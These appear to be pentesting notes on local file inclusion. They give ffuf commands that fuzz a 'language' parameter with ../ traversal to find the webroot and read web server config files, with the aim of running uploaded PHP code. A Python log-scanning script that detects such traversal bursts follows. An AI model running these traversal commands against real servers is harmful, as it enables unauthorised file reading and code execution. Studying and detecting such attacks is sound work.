PRIMARY CATEGORY → LFI

Known Parameters

Reference


Wordlists

Seclists: Fuzzing/LFI

LFI-Jhaddix.txt


Fuzzing Hidden Parameters

See here


Fuzzing Server Files

Server Webroot

Linux Wordlist

Windows Wordlist

There are situations where we must locate the server webroot so that the LFI can be pointed at the directory where we have uploaded a file containing PHP code, in order to have its content evaluated through the include.

Since we do not know whether the webroot path is /var/www/html, /var/www/html/domain.com or some other directory, we first have to discover the directory in question.

/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-windows.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt

Ffuf

ffuf -v -t <THREADS> -w <WORDLIST> -u 'http[s]://<TARGET>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs <INT>
Server Logs | Configurations

If we were not able to identify the server webroot through the previous fuzzing, we should try to read the web server configuration file, since it contains a directive called root (Nginx) or DocumentRoot (Apache) that points to the web application root.

To do so, we may use the LFI-Jhaddix.txt wordlist, as it contains many of the server log and configuration file paths we are looking for.

If we want a more precise scan, we can use the following wordlists:

Web Server Configuration Files

Linux   •   Windows

Ffuf

ffuf -v -t <THREADS> -w <WORDLIST> -u 'http[s]://<TARGET>:<PORT>/index.php?language=../../../../FUZZ' -fs <INT>
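To see what the two ffuf runs above look like from the server side, here is an added detection example (not part of the original notes) that parses constructed Apache/Nginx combined-format access log lines, URL-decodes each request path and flags sources that issue a burst of ../ traversal requests against the language parameter; the sample lines, IPs and the threshold of 5 are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache/Nginx combined log format; only the fields the detection needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')  # ../ or ..\ anywhere in the decoded path

def is_traversal(path: str) -> bool:
    """True if the request path contains a traversal sequence after URL decoding."""
    decoded = path
    for _ in range(3):  # decode again while it still changes, so %2e%2e%2f is not missed
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    return bool(TRAVERSAL_RE.search(decoded))

def scan_log(lines, threshold=5):
    """Return (traversal hits, {ip: count}) for sources at/above threshold; a burst
    walking webroot and config-file candidates is the log-side trace of the ffuf runs."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal(m['path']):
            hits.append((m['ip'], m['path'], m['status']))
            per_ip[m['ip']] += 1
    return hits, {ip: n for ip, n in per_ip.items() if n >= threshold}

# Constructed sample log: one host fuzzing the language parameter, one normal client.
_FUZZ_PATHS = ["var/www/html", "var/www/html/domain.com", "srv/www",
               "usr/share/nginx/html", "etc/nginx/nginx.conf", "etc/apache2/apache2.conf"]
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Oct/2023:13:55:{36 + i:02d} +0000] '
    f'"GET /index.php?language=../../../../{p} HTTP/1.1" 200 612'
    for i, p in enumerate(_FUZZ_PATHS)
] + [
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 8419',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] '
    '"GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fnginx%2fnginx.conf HTTP/1.1" 200 612',
]

if __name__ == "__main__":
    for ip, n in scan_log(SAMPLE_LOG)[1].items():
        print(f"{ip}: {n} traversal requests, likely LFI fuzzing")
```

Note that the identical response size (612) on every hit is exactly what the -fs filter in the ffuf commands is tuned to discard, so size alone is not a useful detection signal; the per-source burst of decoded traversal sequences is.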